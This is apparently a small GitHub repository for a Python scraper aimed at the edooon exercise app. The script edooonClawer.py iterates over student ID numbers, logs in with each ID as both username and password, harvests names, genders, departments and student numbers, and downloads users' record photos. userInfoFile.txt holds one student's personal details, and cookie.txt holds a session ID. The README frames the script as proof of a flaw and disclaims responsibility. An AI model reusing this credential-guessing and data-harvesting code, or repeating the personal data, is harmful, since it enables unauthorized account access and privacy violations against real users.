├── userInfoFile.txt ├── cookie.txt ├── README.md ├── .gitignore └── edooonClawer.py /userInfoFile.txt: -------------------------------------------------------------------------------- 1 | 姓名,性别,专业,学年,类别,学号, 2 | 姓名,性别,专业,学年,类别,学号, 3 | 滕文瑛,女,信息科学技术学院,2011级,本科生,1100012970, 4 | -------------------------------------------------------------------------------- /cookie.txt: -------------------------------------------------------------------------------- 1 | # Netscape HTTP Cookie File 2 | # http://curl.haxx.se/rfc/cookie_spec.html 3 | # This is a generated file! Do not edit. 4 | 5 | b.edooon.com FALSE / FALSE JSESSIONID 40F066A099B56B3ED73900AD6894D161 6 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # edoonCrawler 2 | The intuition of this crawler is attempting ot retrive all the user information from [edooon](https://edooon.com/), which is a lame exercise tracking app. 3 | 4 | # Disclaimer 5 | The author found the 'bug' of the app and tried to prove he/she is right. An actual attack has never been lauched and the author disclaim any responsibility for any further consequence related to this work. 6 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | env/ 12 | build/ 13 | develop-eggs/ 14 | dist/ 15 | downloads/ 16 | eggs/ 17 | .eggs/ 18 | lib/ 19 | lib64/ 20 | parts/ 21 | sdist/ 22 | var/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | 27 | # PyInstaller 28 | # Usually these files are written by a python script from a template 29 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 30 | *.manifest 31 | *.spec 32 | 33 | # Installer logs 34 | pip-log.txt 35 | pip-delete-this-directory.txt 36 | 37 | # Unit test / coverage reports 38 | htmlcov/ 39 | .tox/ 40 | .coverage 41 | .coverage.* 42 | .cache 43 | nosetests.xml 44 | coverage.xml 45 | *,cover 46 | .hypothesis/ 47 | 48 | # Translations 49 | *.mo 50 | *.pot 51 | 52 | # Django stuff: 53 | *.log 54 | local_settings.py 55 | 56 | # Flask stuff: 57 | instance/ 58 | .webassets-cache 59 | 60 | # Scrapy stuff: 61 | .scrapy 62 | 63 | # Sphinx documentation 64 | docs/_build/ 65 | 66 | # PyBuilder 67 | target/ 68 | 69 | # IPython Notebook 70 | .ipynb_checkpoints 71 | 72 | # pyenv 73 | .python-version 74 | 75 | # celery beat schedule file 76 | celerybeat-schedule 77 | 78 | # dotenv 79 | .env 80 | 81 | # virtualenv 82 | venv/ 83 | ENV/ 84 | 85 | # Spyder project settings 86 | .spyderproject 87 | 88 | # Rope project settings 89 | .ropeproject 90 | -------------------------------------------------------------------------------- /edooonClawer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import urllib 5 | import urllib2 6 | import cookielib 7 | from bs4 import BeautifulSoup 8 | import urlparse 9 | from urllib2 import urlopen 10 | from urllib import urlretrieve 11 | import os 12 | 13 | userInfoFile = open("userInfoFile.txt","a") 14 | userInfoFile.write("姓名,性别,专业,学年,类别,学号,\n") 15 | 16 | def userLogin(user_id): 17 | filename = 'cookie.txt' 18 | #声明一个MozillaCookieJar对象实例来保存cookie,之后写入文件 19 | cookie = cookielib.MozillaCookieJar() 20 | opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie)) 21 | postdata = urllib.urlencode({ 22 | 'uname':user_id, 23 | 'passwd':user_id 24 | }) 25 | #登录系统的URL 26 | loginUrl = 'http://b.edooon.com/login' 27 | loginHeader = { 28 | "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36" 29 | } 30 | #模拟登录,并把cookie保存到变量 31 | result = opener.open(loginUrl, postdata) 32 | soup = BeautifulSoup(result.read()) 33 | userNavList = soup.select('span[class="userNav"]') 34 | if userNavList: 35 | for userNav in userNavList: 36 | userInfoFile.write( userNav.get_text().encode('utf-8') + ',') 37 | userInfoFile.write('\n') 38 | out_folder = './' 39 | imgName = user_id+'_' 40 | tmpCnt = 0 41 | imgUrl = 'http://b.edooon.com/' 42 | for image in soup.findAll("img"): 43 | #print "Image: %(src)s" % image 44 | image_url = urlparse.urljoin(imgUrl, image['src']) 45 | filename = image["src"].split("/")[-1] 46 | outpath = os.path.join(out_folder, imgName+ str(tmpCnt)) 47 | if image["src"].startswith('/recordpic'): 48 | urlretrieve(image_url, outpath) 49 | tmpCnt += 1 50 | 51 | def tryAccount(id_start, id_end): 52 | for i in range(id_start, id_end): 53 | print 'Trying: '+(str(i)) 54 | userLogin( str(i) ); 55 | 56 | if __name__ == "__main__": 57 | ID_START = 1100012968 #起始学号 58 | ID_END = 1100012971 #结束学号 59 | tryAccount(ID_START,ID_END) 60 | 61 | #print result.read() 62 | #保存cookie到cookie.txt中 63 | #cookie.save(filename,ignore_discard=True, ignore_expires=True) 64 | --------------------------------------------------------------------------------